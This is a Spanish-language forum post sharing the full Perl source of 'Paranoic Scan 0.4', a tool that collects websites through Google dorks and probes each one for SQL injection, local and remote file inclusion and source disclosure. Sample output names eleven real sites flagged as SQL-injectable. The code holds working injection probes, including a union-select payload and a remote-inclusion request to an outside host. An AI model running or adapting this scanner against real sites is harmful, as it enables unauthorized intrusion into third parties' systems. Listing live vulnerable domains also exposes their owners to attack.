Autor
Hoy traigo un programa que eh estado haciendo porque estaba harto de ir probando cada
web que encontraba en google para saber si tenia la vulnerabilidad que queria
Asi que por eso hice esta tool , con las siguientes opciones
* Permite scaner un archivo con webs
* Permite buscar en google , borrar repes , y luego scanear
Tipos de scan :
* SQL
* LFI
* RFI
* FULL SOURCE DISCLOURE
Ejemplo de uso
Código:
@@@@@ @ @@@@ @ @@ @@@ @@@ @@@ @@@@ @@@ @@@@ @ @@ @@@
@ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@ @
@ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @@ @
@@@ @ @ @@@ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @
@ @@@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @
@ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @@
@@@ @@@ @@@@@@ @@@@ @@@@@@ @ @@@ @@@ @@@ @@@ @@@ @@@ @@@@@@ @
[a] : Scan a File
[b] : Search in google and scan the webs
[option] : b
[+] Dork : ficha.php+id
[+] Pages : 200
[+] Scan Type :
[S] : SQL
[L] : LFI
[R] : RFI
[F] : Full Source Discloure
[A] : All
[Option] : s
[Google] : www.google.com.ar
[Dork] : ficha.php+id
[Pages] : 200
[+] Searching pages..
[+] Cleaning results
[Status] : Scanning
[Webs Count] : 136
[+] SQLI : http://www.3tres3.com/opinion/ficha.php?id=
[+] SQLI : http://www.vincipark.es/ficha.php?id=
[+] SQLI : http://www.maxhuber.cl/ficha.php?id=
[+] SQLI : http://www.alddeaviviendas.com/sitio/ficha.php?id=
[+] SQLI : http://www.bvocal.org/ficha.php?id=
[+] SQLI : http://www.animadas.com/artista-ficha.php?id=
[+] SQLI : http://www.madamedepompadour.cl/ficha.php?id=
[+] SQLI : http://codigo-civil.org/base/ficha.php?id=
[+] SQLI : http://www.cibercolchon.com/ficha.php?id=
[+] SQLI : http://www.100citiesinitiative.org/ficha.php?ID=
[+] SQLI : http://www.nibbledpencil.com/ficha.php?id=
[Status] : Finish
(C) Doddy Hackman 2010
Codigo
Código
#!usr/bin/perl
#Paranoic Scan 0.4
#(c)0ded by Doddy H 2010
use LWP::UserAgent;
use HTTP::Request::Common;
use URI::Split qw(uri_split);
my $nave = LWP::UserAgent->new();
$nave->timeout(5);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
sub head {
system 'cls';
print qq(
@@@@@ @ @@@@ @ @@ @@@ @@@ @@@ @@@@ @@@ @@@@ @ @@ @@@
@ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@ @
@ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @@ @
@@@ @ @ @@@ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @
@ @@@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @
@ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @@
@@@ @@@ @@@@@@ @@@@ @@@@@@ @ @@@ @@@ @@@ @@@ @@@ @@@ @@@@@@ @
);
}
&menu;
sub menu {
&head;
print "[a] : Scan a File\n";
print "[b] : Search in google and scan the webs\n\n";
print "[option] : ";
chomp(my $op = <STDIN>);
if ($op=~/a/ig) {
print "\n[+] Wordlist : ";
chomp(my $word = <STDIN>);
@paginas = repes(savewords($word));
my $option = &men;
scan($option,@paginas);
}
elsif ($op=~/b/ig) {
print "\n[+] Dork : ";
chomp(my $dork = <STDIN>);
print "[+] Pages : ";
chomp(my $pag = <STDIN>);
my $option = &men;
@paginas = &google("www.google.com.ar",$dork,$pag);
scan($option,@paginas);
}
else {
&menu;
}
}
sub scan {
my ($option,@webs) = @_;
print "\n[Status] : Scanning\n";
print "[Webs Count] : ".int(@webs)."\n\n";
for(@webs) {
if ($option=~/S/ig) {
&sql($_);
}
if ($option=~/L/ig) {
&lfi($_);
}
if ($option=~/R/ig) {
&rfi($_);
}
if ($option=~/F/ig) {
&fsd($_);
}
if ($option=~/A/ig) {
&sql($_);
&lfi($_);
&rfi($_);
&fsd($_)
}
}
}
print "\n[Status] : Finish\n";
&finish;
sub toma {
return $nave->request (GET $_[0])->content;
}
sub savefile {
open (SAVE,">>logs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE;
}
sub finish {
print "\n\n\n(C) Doddy Hackman 2010\n\n";
<STDIN>;
exit(1);
}
sub google {
print "\n[Google] : $_[0]\n[Dork] : $_[1]\n[Pages] : $_[2]\n\n[+] Searching pages..\n";
for ($pages=0;$pages<=$_[2];$pages=$pages+10) {
$response = toma("http://$_[0]/search?hl=&q=$_[1]&start=$pages");
while ($response=~m/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {
push(@founds,$1);
}}
print "[+] Cleaning results\n";
for(@founds) {
$t = clean($_);
push(@r,$t);
}
return(repes(@r));
}
sub sql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
savefile("sql-logs.txt",$page);
}}
sub rfi {
my $page = shift;
$code1 = toma($page."http:/www.supertangas.com/");
if ($code1=~/Los mejores TANGAS de la red/ig) { #Esto es conocimiento de verdad xDDD
print "[+] RFI : $page\a\n";
savefile("rfi-logs.txt",$page);
}}
sub lfi {
my $page = shift;
$code1 = toma($page."'");
if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
print "[+] LFI : $page\a\n";
savefile("lfi-logs.txt",$page);
}}
sub fsd {
my $page = shift;
my ($scheme, $auth, $path, $query, $frag) = uri_split($page);
if ($path=~/\/(.*)$/) {
my $me = $1;
$code1 = toma($page.$me);
if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
print "[+] Full Source Discloure : $page\a\n";
savefile("fpd-logs.txt",$page);
}}}
sub repes {
foreach my $palabra ( @_ ) {
next if $repety{ $palabra }++;
push @revisado,$palabra;
}
return @revisado;
}
sub savewords {
open (FILE,$_[0]);
@words = <FILE>;
close FILE;
for(@words) {
$t = clean($_);
push(@r,$t);
}
return(@r);
}
sub men {
print "\n\n[+] Scan Type : \n\n";
print "[S] : SQL\n";
print "[L] : LFI\n";
print "[R] : RFI\n";
print "[F] : Full Source Discloure\n";
print "[A] : All\n\n";
print "\n[Option] : ";
chomp(my $option = <STDIN>);
return $option;
}
sub clean {
if ($_[0] =~/\=/) {
my @sacar= split("=",$_[0]);
return(@sacar[0]."=");
}
}
#The End
#Contact : doddy-hackman[at]hotmail[com]
#blog : doddy-hackman.blogspot.com
En línea
